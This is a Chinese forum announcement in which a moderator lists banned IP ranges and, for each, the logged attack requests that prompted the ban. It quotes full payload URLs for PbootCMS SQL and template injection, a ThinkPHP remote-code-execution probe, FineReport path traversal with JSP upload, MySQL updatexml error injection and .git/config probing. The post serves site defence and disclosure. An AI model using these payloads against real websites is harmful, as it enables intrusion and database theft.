MT BBS

欢迎来此! 每天BBS | 综合论坛

立即加入我们以访问我们的所有功能。注册并登录后,您将能够创建主题、发布对现有帖子的回复、为您的其他成员提供声誉、获得自己的私人信使等等。它也快速且完全免费,您还在等什么?

提出问题

从我们的社区提出问题并获得答案

回答

回答触及你知识领域的问题,携手帮助他人,或许可以申请相关的版块!

加入我们!

加入QQ群聊或是TG群组

公告 公示封禁IP 用户信息 警告等

爆炒臭屎火药腐烂味鱿鱼

管理成员
用户
注册
2024/05/10
消息
40
反馈评分
2
点数
142
勋章
1
每元
90.00Y
每刀
9.00D
    Windows 10 Chrome 134.0.0.0
  • #1
目前 我们封禁了以下IP段
截止2025年3月14日
45.77.*
原因:45.77.8.6 日本东京IP 有代理嫌疑 在2025-03-08 02:46:59至2025-03-08 02:47:01 访问URL:/tteesstt/%7B、/?tteesstt 潜在的模糊测试(Fuzzing)或漏洞探测行为,攻击者通过构造异常路径和特殊字符测试服务器响应 在2025-03-14 01:31:48至2025-03-14 01:31:51 同时在2025-03-15 03:02:30 2025-03-15 03:02:32 2025-03-15 03:02:34 2025-03-15 03:02:37 访问URL:/?tag=%7Bpboot%7Buser%3Ax%7D%3Asql+sql%3Dsex3elect%2F%2A%2A%2F111222333%2F%2A%2A%2Fas%2F%2A%2A%2Fid%2F%2A%2A%2Ffx3erom%2F%2A%2A%2Fay_site%7D%5Bsql%3Aid%5D%7B%2Fpboot%7Buser%3Ax%7D%3Asql%7D 、/?tag=%7Bpboot%7Buser%3Ax%7D%3Asql+sql%3Dsex3elect%2F%2A%2A%2F111222333%2F%2A%2A%2Fas%2F%2A%2A%2Fid%2F%2A%2A%2Ffx3erom%2F%2A%2A%2Fay_site%7D%5Bsql%3Aid%5D%7B%2Fpboot%7Buser%3Ax%7D%3Asql%7D&tagstpl=about.html 、 /?tag=%7Bpboot%7Buser%3Ax%7D%3Asql+sql%3Dsex3elect%2F%2A%2A%2F111222333%2F%2A%2A%2Fas%2F%2A%2A%2Fid%2F%2A%2A%2Ffx3erom%2F%2A%2A%2Fay_site%7D%5Bsql%3Aid%5D%7B%2Fpboot%7Buser%3Ax%7D%3Asql%7D&tagstpl=search.html 、/?tag=%7Bpboot%7Buser%3Ax%7D%3Asql+sql%3Dsex3elect%2F%2A%2A%2F111222333%2F%2A%2A%2Fas%2F%2A%2A%2Fid%2F%2A%2A%2Ffx3erom%2F%2A%2A%2Fay_site%7D%5Bsql%3Aid%5D%7B%2Fpboot%7Buser%3Ax%7D%3Asql%7D&tagstpl=news.html , 试图使用典型的 PbootCMS SQL注入攻击尝试,攻击者试图通过模板标签伪造SQL查询语句,绕过安全过滤并窃取数据库信息
45.134.*
原因:45.134.213.214 荷兰IP 有VPN代理嫌疑 在2025-03-14 16:52:11至2025-03-14 16:52:14 访问URL: /?s=../%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP 、/?s=../%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP , 使用典型的 ThinkPHP框架远程代码执行(RCE)漏洞利用尝试,攻击者试图通过构造恶意参数执行任意PHP代码
103.46.*
原因:103.46.185.167 香港IP 有VPN代理嫌疑 在2025-03-14 10:59:42 访问URL:/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update1.jsp 、 /WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../../../../../etc¤tUserName=admin¤tUserId=1&isWebReport=true , 此次攻击是典型的路径遍历+文件上传漏洞利用,攻击者试图通过构造恶意路径上传JSP木马
121.237.*
原因:121.237.248.4 江苏IP 在2025-03-14 08:33:29至2025-03-14 08:33:42 访问URL: /?tag={pboot{user:x}:if([p.hpinfo][0]())}{/pboot{user:x}:if} 、/?tag={pboot{user:x}:if([p.hpinfo][0]())}{/pboot{user:x}:if}&tagstpl=about.html、 /?tag={pboot{user:x}:if([p.hpinfo][0]())}{/pboot{user:x}:if}&tagstpl=search.html、/?tag={pboot{user:x}:if([p.hpinfo][0]())}{/pboot{user:x}:if}&tagstpl=news.html、 /?tag={pboot{user:x}:if([p.hpinfo][0]())}{/pboot{user:x}:if}&tagstpl=product.html、 /?keyword={pboot{user:x}:if([p.hpinfo][0]())}{/pboot{user:x}:if} , 使用模板注入攻击:攻击者构造的URL参数tag={pboot{user:x}:if([p.hpinfo][0]())} 是典型的PbootCMS模板注入尝试。攻击者试图通过伪造模板标签执行PHP函数
202.61.*
原因:202.61.86.206 香港 阿里云IP 有VPN代理嫌疑 在2025-01-17 23:03:49 访问URL:/index.php/?backurl=id&suanve=}{pboot:if((get_lg/*suanve-*/())/**/(get_backurl/*suanve-*/()))}123321suanve{/pboot:if} 在2025-01-17 23:03:52 访问URL:/index.php/keyword?backurl=id&keyword=}{pboot:if((get_lg/*suanve-*/())/**/(get_backurl/*suanve-*/()))}123321suanve{/pboot:if} 在2025-01-17 23:03:55 访问URL:/?backurl=id&member/login/?suanve=}{pboot:if((get_lg/*suanve-*/())/**/(get_backurl/*suanve-*/()))}123321suanve{/pboot:if} 三个URL均涉及 PbootCMS模板注入攻击,攻击者通过构造恶意模板标签尝试执行任意代码或探测系统漏洞,在2025-01-19 01:02:16 访问URL:/index.php?id=1%20and%20updatexml(1,concat(0x7e,md5(207422909),0x7e),1)&s=apigoods/get_goods_detail 是典型的 MySQL报错注入攻击,攻击者试图通过updatexml函数的XPath语法错误回显敏感信息
54.144.*
原因:54.144.40.61 美国亚马逊IP 有VPN代理嫌疑 在2025-01-25 23:01:56及2025-01-25 23:01:51 访问URL:/.git/config 攻击者试图获取控制系统的敏感信息
120.78.*
原因:120.78.231.159 深圳阿里云IP 有VPN代理嫌疑 在2025-01-28 13:04:15 访问URL:/site/info?token= 尝试获取有效 token,从而访问敏感信息或功能 及在2025-01-28 13:04:43 访问URL:/ashx/getPlatParam.ashx 攻击者试图通过访问 /ashx/getPlatParam.ashx 获取服务器配置、平台参数或其他敏感信息。
39.108.*
原因:39.108.218.114 深圳阿里云IP 有VPN代理嫌疑 在2025-01-28 13:09:55 访问URL:/site/info?token= 尝试获取有效 token,从而访问敏感信息或功能 及在2025-01-28 13:10:24 访问URL:/ashx/getPlatParam.ashx 攻击者试图通过访问 /ashx/getPlatParam.ashx 获取服务器配置、平台参数或其他敏感信息。(与120.78.231.159 深圳阿里云IP攻击手法一致)
136.243.*
原因:136.243.220.211 德国IP 有VPN代理嫌疑有VPN代理嫌疑 在2025-02-03 17:39:30至2025-02-03 17:51:36期间 非法爬取页面高达123个
129.226.*
原因:129.226.123.18 香港腾讯云IP 有VPN代理嫌疑 在2025-02-06 01:01:07 访问URL:/js/player/dmplayer/dmku/dm_rule.html 很可能是攻击者在进行目录遍历或敏感文件探测
61.160.*
原因:61.160.223.77 江苏IP 在2025-02-11 19:36:01 2025-02-11 19:36:31 2025-02-15 23:11:22 2025-02-15 23:11:25 2025-02-17 05:20:08 2025-02-17 05:20:13 2025-02-19 16:55:50 2025-02-19 16:55:52 时间点 访问URL:/index/ajax/lang?lang=../../application/database 很可能是路径遍历攻击或本地文件包含攻击。攻击者试图通过构造特殊的路径参数访问服务器上的敏感文件。
216.118.*
原因:216.118.237.178 香港IP 有VPN代理嫌疑 在2025-02-16 15:04:32至2025-02-16 15:04:34 访问URL:/Editor/UEditor/net/controller.ashx?action=catchimage 等 攻击者在探测或滥用 UEditor 的远程图片抓取功能 在2025-02-17 07:45:11至2025-02-17 07:45:14期间 访问URL:/Scripts/Ueditor/net/controller.ashx?action=catchimage 等
35.180.*
原因:35.180.251.188 法国巴黎IP 有VPN代理嫌疑 在2025-02-17 17:37:05至2025-02-17 17:38:15 访问WordPress目录可能想要获取后台 在2025-02-17 17:38:29至2025-02-17 17:39:42 分别访问URL:/old、/backup、/new、/test、/temp、/blog目录
156.234.*
原因:156.234.207.234 豪登 约翰内斯堡IP 有VPN代理嫌疑 在2025-02-19 16:55:50至2025-02-19 18:52:42 访问目录与216.118.237.178 IP一致
101.33.*
原因:101.33.74.75 韩国首尔IP 有VPN代理嫌疑 在2025-02-24 22:49:58至2025-02-24 22:49:59 访问目录与216.118.237.178以及129.226.123.18 IP一致
3.133.*
原因:3.133.103.232 美国 俄亥俄州 都柏林 亚马逊云IP 有VPN代理嫌疑 在2025-02-25 08:37:27 访问URL:/.git/config 与54.144.40.61 IP一致
150.109.*
原因:150.109.43.245 香港腾讯云IP 有VPN代理嫌疑 在2025-03-02 00:17:52至2025-03-02 00:17:53 访问目录与216.118.237.178以及129.226.123.18 IP一致
44.234.*
原因:44.234.34.165 美国 俄勒冈州 波特兰 亚马逊云IP 有VPN代理嫌疑 在2025-02-25 08:37:27 访问URL:/.git/config 与54.144.40.61 IP一致
119.45.*
原因:119.45.95.136 南京腾讯云IP 有VPN代理嫌疑 在2025-02-25 08:37:27 访问URL:/ueditor/net/controller.ashx?action=catchimage与216.118.237.178 IP一致
58.212.*
原因:58.212.110.173 南京电信IP (可能是城域网) 在2025-03-16 10:15:09至2025-03-16 10:15:11 访问URL:/tteesstt/%7B、/?tteesstt 潜在的模糊测试(Fuzzing)或漏洞探测行为,攻击者通过构造异常路径和特殊字符测试服务器响应 与45.77.8.6 IP 部分一致
117.88.*
原因:117.88.136.140 南京电信IP(可能是城域网) 在2025-03-16 16:08:23至2025-03-16 16:08:37 访问URL:/?tag={pboot{user:x}:if([p.hpinfo][0]())}{/pboot{user:x}:if} 、/?tag={pboot{user:x}:if([p.hpinfo][0]())}{/pboot{user:x}:if}&tagstpl=about.html 、 /?tag={pboot{user:x}:if([p.hpinfo][0]())}{/pboot{user:x}:if}&tagstpl=search.html 、/?tag={pboot{user:x}:if([p.hpinfo][0]())}{/pboot{user:x}:if}&tagstpl=news.html 、/?tag={pboot{user:x}:if([p.hpinfo][0]())}{/pboot{user:x}:if}&tagstpl=product.html 、 /?keyword={pboot{user:x}:if([p.hpinfo][0]())}{/pboot{user:x}:if} ,与45.77.8.6 IP部分一致
23.248.*
原因:23.248.233.18 中国香港IP 有VPN代理嫌疑 在2025-03-21 18:16:15至2025-03-21 18:16:22期间访问thinkphp的插件目录等,无效访问(因为程序不是thinkphp的)
 

音乐测试

加载中...
shape1
shape2
shape3
shape4
shape5
shape6
后退
顶部